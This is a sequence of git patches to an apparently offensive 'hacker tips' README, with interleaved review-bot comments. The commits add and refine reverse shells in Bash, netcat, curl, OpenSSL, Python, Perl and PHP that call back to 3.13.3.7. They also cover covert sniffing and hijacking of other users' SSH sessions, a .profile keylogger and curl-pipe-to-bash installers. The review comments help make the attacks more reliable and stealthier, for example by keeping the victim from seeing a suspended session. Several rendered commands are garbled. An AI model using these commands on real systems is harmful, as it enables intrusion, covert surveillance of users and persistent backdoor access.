@@ -470,7 +470,7 @@ Other free services are limited to forward HTTPS only (not raw TCP). Some tricks **3.iii.b HTTPS reverse tunnels** -On the server, use any one of these three tunneling services: +On the server, use any one of these three HTTPS tunneling services: ```sh ### Reverse HTTPS tunnel to forward public HTTPS requests to this server's port 8080: ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@localhost.run @@ -481,7 +481,9 @@ curl -fL -o cloudflared https://github.com/cloudflare/cloudflared/releases/lates chmod 755 cloudflared cloudflared tunnel --url http://localhost:8080 --no-autoupdate ``` -Either service will generate a new temporary HTTPS-URL for you to use. Optionally, use [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) on both ends to tunnel raw TCP over the HTTPS URL. +Either service will generate a new temporary HTTPS-URL for you to use. + +Then, use [websocat](https://github.com/vi/websocat) or [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) on both ends to tunnel raw TCP over the HTTPS URL: A. A simple STDIN/STDOUT pipe via HTTPS: ```sh @@ -495,7 +497,7 @@ websocat wss:// B. Forward raw TCP via HTTPS: ```sh -### On the server: Gost will translate any HTTP-websocket request to any raw TCP socks5 request: +### On the server: Gost will translate any HTTP-websocket request to a TCP socks5 request: gost -L mws://:8080 ``` From 793f4a14a860c2ebd4a86c72a3e21f4299344e3e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 15:56:18 +0100 Subject: [PATCH 20/56] Update README.md --- README.md | 48 +++++++++++++++++++++++++++++++----------------- 1 file changed, 31 insertions(+), 17 deletions(-) diff --git a/README.md b/README.md index dc1fde8..edcd059 100644 --- a/README.md +++ b/README.md 
@@ -80,11 +80,12 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [cryptsetup](#crypto-filesystem) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) -1. [Sniffing a user's SSH session](#ssh-sniffing) - 1. [with strace](#ssh-sniffing-strace) - 1. [with script](#ssh-sniffing-script) - 1. [with a wrapper script](#ssh-sniffing-wrapper) - 1. [with SSH-IT](#ssh-sniffing-sshit) +1. [SSH session sniffing and hijaking](#ssh-sniffing) + 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) + 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) + 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) + 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) + 1. [Hijak / Take-over a running SSH session](#hijak) 1. [VPN and Shells](#vpn-shell) 1. [Disposable Root Servers](#shell) 1. [VPN/VPS Providers](#vpn) @@ -1566,15 +1567,10 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. --- ## 9. SSH Sniffing - -**9.i Sniff a user's SSH session with strace** -```sh -strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done -``` -Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control. - -**9.ii Sniff a user's SSH session with script** +**9.i Sniff a user's SHELL session with script** + +A method to log the shell session of a user (who logged in via SSH). The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in: ```sh 
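Review bot: "hijaking" / "Hijak" are misspellings (hijacking / Hijack) and appear in both the TOC line and the new 9.v heading; the anchor `#hijak` can stay if short ids are preferred, but the visible text should be spelled correctly. The renamed entries now usefully separate "SHELL session" (the victim logs in to this host) from "outgoing SSH session" (the victim sshes from this host onward); the section intros below should open with the same wording so the distinction carries through.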
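Review bot: `exec script -qc /bin/bash ~/.ssh-log.txt` in `.profile` replaces the login shell, so on a host without `script` (or with a PATH that lacks it) the user's login dies at once and the tampering is obvious; guard it with `command -v script >/dev/null && exec script ...`. Two facts belong in the paragraph: the log grows without bound under the user's own home where the user can read it back, and the zap-args hint below hides the process arguments but not the file. "The tool script has been part of Unix for decades" is true, but `-c COMMAND` is the util-linux spelling; BSD `script` takes the command positionally after the file, so the one-liner is Linux-specific.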
@@ -1582,10 +1578,18 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile ``` Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. - -**9.iii. Sniff a user's SSH session with a wrapper script** + +**9.ii Sniff a user's outgoing SSH session with strace** +```sh +strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done +``` +Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control. -Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0) + + +**9.iii. Sniff a user's outgoing SSH session with a wrapper script** + +Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions) Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
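Review bot: `strace -e trace=read -p 2>&1` is missing the PID argument as rendered; if it is an angle-bracket placeholder in the source, use a form that survives rendering (`-p PID`). The `grep '^read.*= [1-9]$'` filter keeps only reads that returned 1 to 9 bytes, i.e. individual keystrokes, so anything pasted into the sniffed session (a password from a manager, a heredoc) is dropped silently; say so, or loosen the filter. On the ptrace_scope sentence: with Yama scope 1, `strace -p` on a process that is not your descendant fails unless you hold CAP_SYS_PTRACE, which is exactly what the deleted "unless uid=0" was saying; keep that qualifier so readers who are already root know the strace method still works for them.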
@@ -1629,7 +1633,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH. -**9.iv Sniff a user's SSH session using SSH-IT** +**9.iv Sniff a user's outgoing SSH session using SSH-IT** The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). @@ -1637,6 +1641,16 @@ The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-i bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` + +**9.v Hijak / Take-over a running SSH session** + +Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: +```sh +ps alxww | grep ssh +./reptyr +### or: ./reptyr $(pidof -s ssh) +``` + --- ## 10. VPN & Shells From c038c3882f3db73a172ede3bb050c869f904e502 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 16:09:34 +0100 Subject: [PATCH 21/56] Update README.md From 7c4128327a87f300f6121ffcb982814017cc5c3c Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 16:26:14 +0100 Subject: [PATCH 22/56] Update README.md --- README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index edcd059..2dcc7c8 100644 --- a/README.md +++ b/README.md @@ -1646,9 +1646,10 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh -ps alxww | grep ssh -./reptyr -### or: ./reptyr $(pidof -s ssh) +ps ax -o pid,ppid,cmd | grep 'ssh ' +./reptyr -T +### or: ./reptyr -T $(pidof -s ssh) +### Must use '-T' or otherwise the original user will see that his SSH process gets suspended. ``` --- From 2df2aed368059c93e6e3845ff7df9529ff602cf5 Mon Sep 17 00:00:00 2001 
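Review bot: the PID argument to `./reptyr` is missing as rendered, the same placeholder problem as the strace line. More important, reptyr attaches with ptrace, so it is subject to the same Yama `ptrace_scope` restriction discussed three sections up: as an unprivileged user you can only grab your own processes, and taking over another user's ssh client needs root (CAP_SYS_PTRACE). State that, because "take over an existing SSH session" reads as if any local user could do it.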
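Review bot: `ps ax -o pid,ppid,cmd | grep 'ssh '` matches the grep itself (its own cmd line is `grep ssh `), so the listing always contains one bogus entry; `grep '[s]sh '` or `pgrep -a ssh` avoids it. The `-T` explanation is the important part of this change; put it as a comment before the command rather than after the alternative, and say what `-T` is (reptyr's tty-stealing mode) so readers understand why the visible symptom without it is a suspended process.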
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:18:21 +0100 Subject: [PATCH 23/56] Update README.md --- README.md | 24 ++++++++++++++---------- 1 file changed, 14 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 2dcc7c8..515af05 100644 --- a/README.md +++ b/README.md @@ -51,9 +51,9 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Reverse Shells](#reverse-shell) 1. [with gs-netcat](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) - 2. [with cURL](#curlshell) - 1. [without Bash](#reverse-shell-no-bash) - 1. [with remote.moe](#revese-shell-remote-moe) + 2. [with cURL (encrypted)](#curlshell) + 1. [without /dev/tcp](#reverse-shell-no-bash) + 1. [with remote.moe (encrypted)](#revese-shell-remote-moe) 1. [with Python](#reverse-shell-python) 1. [with Perl](#reverse-shell-perl) 1. [with PHP](#reverse-shell-php) @@ -1113,7 +1113,7 @@ bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' ``` -**5.i.c. Reverse shell with cURL** +**5.i.c. Reverse shell with cURL (encrypted)** Use [curlshell](https://github.com/SkyperTHC/curlshell). This also works through proxies and when direct TCP connection to the outside world is prohibited: ```sh @@ -1128,7 +1128,7 @@ curl -skfL https://1.2.3.4:8080 | bash ``` -**5.i.d. Reverse shell without Bash** +**5.i.d. Reverse shell without /dev/tcp** Embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: @@ -1140,6 +1140,11 @@ nc -e /bin/bash -vn 3.13.3.7 1524 Variant if *'-e'* is not supported: ```sh +{ nc -vn 3.13.3.7 1524 &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : +``` + +Variant for older */bin/sh*: +```sh mkfifo /tmp/.io sh -i 2>&1 /tmp/.io ``` 
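Review bot: as rendered, `{ nc -vn 3.13.3.7 1524 &- | sh 2>&3 >&3 3>&- ; } 3>&1 | :` and `sh -i 2>&1 /tmp/.io` have lost their `<` redirections: bash parses a bare `&-` as a background `&` followed by a command named `-`, and the fifo line neither reads from `/tmp/.io` nor pipes into nc. If a literal `<` is being swallowed on render, escape it or make sure these lines stay inside a fenced block. Separately, labelling the curlshell entry "(encrypted)" in the TOC while the command still uses `curl -k` overstates it: the channel is encrypted but the server is unauthenticated; either pin the key or call it "TLS, unverified".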
@@ -1152,14 +1157,13 @@ sh -i 2>&1 /tmp/.io Telnet variant when mkfifo is not supported (Ulg!): ```sh -(touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) & -tail -f /dev/shm/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/dev/shm/.fio +({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ) +tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio ``` -Note: Use */tmp/.fio* if */dev/shm* is not available. -Note: This trick logs your commands to a file. The file will be *unlinked* from the fs after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. +Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. -**5.i.e. Reverse shell with remote.moe and ssh** +**5.i.e. Reverse shell with remote.moe and ssh (encrypted)** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): From c72140ec7608f69c40052412caa504fc7f5a2f64 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:19:31 +0100 Subject: [PATCH 24/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 515af05..288b537 100644 --- a/README.md +++ b/README.md @@ -1135,7 +1135,7 @@ Embedded systems do not always have Bash and the */dev/tcp/* trick will not work On the remote system: ```sh -nc -e /bin/bash -vn 3.13.3.7 1524 +nc -e /bin/sh -vn 3.13.3.7 1524 ``` Variant if *'-e'* is not supported: From 110630ef4044c8c5be0104fdf8cd7084dca95fac Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:28:50 +0100 Subject: [PATCH 25/56] Update README.md --- README.md | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) 
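Review bot: "The file will be *unlinked* from the after 60 seconds" lost the word "filesystem" in this rewrite. On the new `/tmp/.fio` default: `touch` creates it with the caller's umask (typically 0644), so for those 60 seconds every local user can read the commands typed through it, which is what the old note was warning about; add `umask 077` before the `touch`, or keep the /dev/shm hint (tmpfs, never written to disk) as the preferred location instead of dropping it.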
diff --git a/README.md b/README.md index 288b537..1801cf4 100644 --- a/README.md +++ b/README.md @@ -52,8 +52,9 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [with gs-netcat](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) 2. [with cURL (encrypted)](#curlshell) - 1. [without /dev/tcp](#reverse-shell-no-bash) + 3. [with OpenSSL (encrypted)](#sslshell) 1. [with remote.moe (encrypted)](#revese-shell-remote-moe) + 1. [without /dev/tcp](#reverse-shell-no-bash) 1. [with Python](#reverse-shell-python) 1. [with Perl](#reverse-shell-perl) 1. [with PHP](#reverse-shell-php) @@ -1124,11 +1125,25 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3 ``` ```sh # On the target: -curl -skfL https://1.2.3.4:8080 | bash +curl -skfL https://3.13.3.7:8080 | bash +``` + + +**5.i.d. Reverse shell with OpenSSL (encrypted)** + +```sh +# Generate SSL keys: +openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC" +# Start your listening server: +openssl s_server -port 1524 -cert cert.pem -key key.pem +``` +```sh +# On the target: +{ openssl s_client -connect 3.13.3.7:1524 -quiet &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : ``` -**5.i.d. Reverse shell without /dev/tcp** +**5.i.e. Reverse shell without /dev/tcp** Embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: 
@@ -1163,7 +1178,7 @@ tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. -**5.i.e. Reverse shell with remote.moe and ssh (encrypted)** +**5.i.f. Reverse shell with remote.moe and ssh (encrypted)** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): @@ -1190,13 +1205,13 @@ rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p & ``` -**5.i.f. Reverse shell with Python** +**5.i.g. Reverse shell with Python** ```sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` -**5.i.g. Reverse shell with Perl** +**5.i.h. Reverse shell with Perl** ```sh # method 1 From 0b3c8f7c7bb2da5d6bdeab61c847bd50c1d97251 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:29:22 +0100 Subject: [PATCH 26/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1801cf4..db01186 100644 --- a/README.md +++ b/README.md @@ -1220,7 +1220,7 @@ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotob perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ``` -**5.i.h. Reverse shell with PHP** +**5.i.i. Reverse shell with PHP** ```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' From cef76541ee81381fc3f9c3800f9b705e0f984bde Mon Sep 17 00:00:00 2001 
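Review bot: the TOC numbering in PATCH 25/56 hunk @@ -52,8 +52,9 @@ mixes `1.`, `2.` and `3.` prefixes; Markdown numbers the list sequentially from the first item anyway and the rest of this TOC uses `1.` throughout, so use `1.` here too. The `#revese-shell-remote-moe` anchor keeps the "revese" misspelling; if the heading's id is spelled the same way, fix both ends together rather than leaving the typo in the link text readers copy.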
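Review bot: the "(encrypted)" labels in PATCH 25/56 hunk @@ -1124,11 +1125,25 @@ describe transport encryption only, not authentication: `curl -skfL` uses `-k` to skip certificate verification, and `openssl s_client -connect 3.13.3.7:1524 -quiet` is given no `-CAfile` or `-verify_return_error`, so neither client checks the self-signed certificate produced by `openssl req -x509`, and an on-path party can present its own certificate. Say this in the section text so "encrypted" is not read as "authenticated". The new OpenSSL one-liner also shows the same `&-` artifact as the nc variant (`-quiet &- | sh ...`), which is not valid as rendered; verify the committed line.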
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:33:55 +0100 Subject: [PATCH 27/56] Update README.md --- README.md | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index db01186..d956c3c 100644 --- a/README.md +++ b/README.md @@ -49,7 +49,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [File transfer to Telegram](#tg) 1. [Reverse Shell / Dumb Shell](#reverse-shell) 1. [Reverse Shells](#reverse-shell) - 1. [with gs-netcat](#reverse-shell-gs-netcat) + 1. [with gs-netcat (encrypted)](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) 2. [with cURL (encrypted)](#curlshell) 3. [with OpenSSL (encrypted)](#sslshell) @@ -1080,20 +1080,21 @@ curl -sF document=@file.zip "https://api.telegram.org/bot/sendDocu ## 5. Reverse Shell / Dumb Shell -**5.i.a. Reverse shell with gs-netcat** +**5.i.a. Reverse shell with gs-netcat (encrypted)** Use [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :> ```sh -gs-netcat -s MySecret -l -i # Host +X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/x)" +# or X=ExampleSecretChangeMe bash -c "$(wget --no-verbose -O- https://gsocket.io/x)" ``` -Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed. To connect to the shell from your workstation: ```sh -gs-netcat -s MySecret -i +S=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/x)" +# or gs-netcat -s ExampleSecretChangeMe -i +# Add -T to tunnel through TOR ``` -Use -T to tunnel trough TOR. **5.i.b. Reverse shell with Bash** 
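Review bot: PATCH 27/56 hunk @@ -1080,20 +1080,21 @@ removes the sentence explaining `-D` (daemon with watchdog auto-restart) without carrying that information into the new block, and replaces a local `gs-netcat -s ... -l -i` invocation with `X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/x)"`, a fetch-and-execute of a remote script; the text should say what `https://gsocket.io/x` installs and that the one-liner trusts that host and its TLS certificate (`-f` only makes curl fail on HTTP errors, it pins nothing). Two context-line nits worth folding into the same edit: "than gs-netcat is" should be "then", and "and using the Global Socket Relay network" is missing its verb ("and uses").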
From 83097ef44b548991a42830c49350988da1283fe8 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:42:24 +0100 Subject: [PATCH 28/56] Update README.md --- README.md | 25 +++++++++++++++++++------ 1 file changed, 19 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index d956c3c..5bd3d32 100644 --- a/README.md +++ b/README.md @@ -52,6 +52,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [with gs-netcat (encrypted)](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) 2. [with cURL (encrypted)](#curlshell) + 2. [with cURL (cleartext)](#curltelnet) 3. [with OpenSSL (encrypted)](#sslshell) 1. [with remote.moe (encrypted)](#revese-shell-remote-moe) 1. [without /dev/tcp](#reverse-shell-no-bash) @@ -1129,8 +1130,20 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3 curl -skfL https://3.13.3.7:8080 | bash ``` + +**5.i.d Reverse shell with cURL (cleartext)** + +Start ncat to listen for multiple connections: +```sh +ncat -kl 1524 +``` +```sh +# On the target: +C="curl -Ns telnet://3.13.3.7:1524"; $C &1 | sh 2>&1 | $C >/dev/null +``` + -**5.i.d. Reverse shell with OpenSSL (encrypted)** +**5.i.e. Reverse shell with OpenSSL (encrypted)** ```sh # Generate SSL keys: @@ -1144,7 +1157,7 @@ openssl s_server -port 1524 -cert cert.pem -key key.pem ``` -**5.i.e. Reverse shell without /dev/tcp** +**5.i.f. Reverse shell without /dev/tcp** Embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: 
@@ -1179,7 +1192,7 @@ tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. -**5.i.f. Reverse shell with remote.moe and ssh (encrypted)** +**5.i.g. Reverse shell with remote.moe and ssh (encrypted)** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): @@ -1206,13 +1219,13 @@ rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p & ``` -**5.i.g. Reverse shell with Python** +**5.i.h. Reverse shell with Python** ```sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` -**5.i.h. Reverse shell with Perl** +**5.i.i. Reverse shell with Perl** ```sh # method 1 @@ -1221,7 +1234,7 @@ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotob perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ``` -**5.i.i. Reverse shell with PHP** +**5.i.j. Reverse shell with PHP** ```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' From a56a62d38df5d02930fe5b2238451a7a6a01c394 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:45:17 +0100 Subject: [PATCH 29/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5bd3d32..0aa58b9 100644 --- a/README.md +++ b/README.md 
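Review bot: in PATCH 28/56 hunk @@ -1129,8 +1130,20 @@ the new heading `**5.i.d Reverse shell with cURL (cleartext)**` lacks the trailing period its neighbours use (`5.i.c.`, `5.i.e.`), and the TOC hunk adds it as a second `2.` item. The target line `$C &1 | sh 2>&1 | $C >/dev/null` is not valid as rendered (`$C &1` backgrounds the first curl and then runs a command named `1`), so a redirection before `&1` seems to have been lost; verify the committed line. Since `$C` is invoked twice, the listener sees two separate TCP connections, one for input and one for output; stating that in the text explains why `ncat -k` (keep listening) is required.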
@@ -1135,7 +1135,7 @@ curl -skfL https://3.13.3.7:8080 | bash Start ncat to listen for multiple connections: ```sh -ncat -kl 1524 +ncat -kltv 1524 ``` ```sh # On the target: From 2d4b56c0965e7bce067978acda717c1c95f59e12 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 08:58:51 +0100 Subject: [PATCH 30/56] Update README.md --- README.md | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 0aa58b9..0578e10 100644 --- a/README.md +++ b/README.md @@ -1172,21 +1172,22 @@ Variant if *'-e'* is not supported: { nc -vn 3.13.3.7 1524 &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : ``` +* On modern shells this can be shortened to `{ nc -v 127.0.0.1 31337 &1|:`. (*thanks IA_PD*). +* The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Soalris) or Korn shell (AIX). Use `mkfifo` instead. + Variant for older */bin/sh*: ```sh -mkfifo /tmp/.io -sh -i 2>&1 /tmp/.io +mkfifo /tmp/.io; sh -i 2>&1 /tmp/.io ``` Telnet variant: ```sh -mkfifo /tmp/.io -sh -i 2>&1 /tmp/.io +mkfifo /tmp/.io; sh -i 2>&1 /tmp/.io ``` Telnet variant when mkfifo is not supported (Ulg!): ```sh -({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ) +({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ); tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio ``` Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. From f1ed9e984fca6d3aa929196d1cc493c98655fe3c Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 09:02:26 +0100 Subject: [PATCH 31/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0578e10..8206203 100644 --- a/README.md +++ b/README.md 
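Review bot: the two bullets added in PATCH 30/56 hunk @@ -1172,21 +1172,22 @@ carry typos ("wont" should be "won't", "orignal" should be "original", "Soalris" should be "Solaris"), and the shortened example `{ nc -v 127.0.0.1 31337 &1|:` uses a different host and port from every other example in the section (3.13.3.7 1524), which reads like a leftover test value. As rendered, the "older /bin/sh" block and the "Telnet variant" block are now identical (`mkfifo /tmp/.io; sh -i 2>&1 /tmp/.io`), so either the telnet form lost its tail in rendering or the second block is a copy; check the committed file before merging.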
@@ -1173,7 +1173,7 @@ Variant if *'-e'* is not supported: ``` * On modern shells this can be shortened to `{ nc -v 127.0.0.1 31337 &1|:`. (*thanks IA_PD*). -* The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Soalris) or Korn shell (AIX). Use `mkfifo` instead. +* The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead. Variant for older */bin/sh*: ```sh From a7e4f2078cfbfdd51930778063942a2a01afafea Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 09:06:20 +0100 Subject: [PATCH 32/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8206203..4a30392 100644 --- a/README.md +++ b/README.md @@ -1172,7 +1172,7 @@ Variant if *'-e'* is not supported: { nc -vn 3.13.3.7 1524 &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : ``` -* On modern shells this can be shortened to `{ nc -v 127.0.0.1 31337 &1|:`. (*thanks IA_PD*). +* On modern shells this can be shortened to `{ nc 3.13.3.7 1524 &1|:`. (*thanks IA_PD*). * The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead. Variant for older */bin/sh*: From f240f9374fb34b30e5693f4cc83138d7d9b76556 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 11:19:37 +0100 Subject: [PATCH 33/56] Update README.md --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 4a30392..aac3248 100644 --- a/README.md +++ b/README.md 
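Review bot: PATCH 31/56 fixes "Soalris" but leaves "wont" and "orignal" on the very line it touches in hunk @@ -1173,7 +1173,7 @@; fold those into the same one-line change rather than another follow-up commit. PATCH 32/56 then corrects the host and port of the shortened example to match the section; both fixes could have been a single commit.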
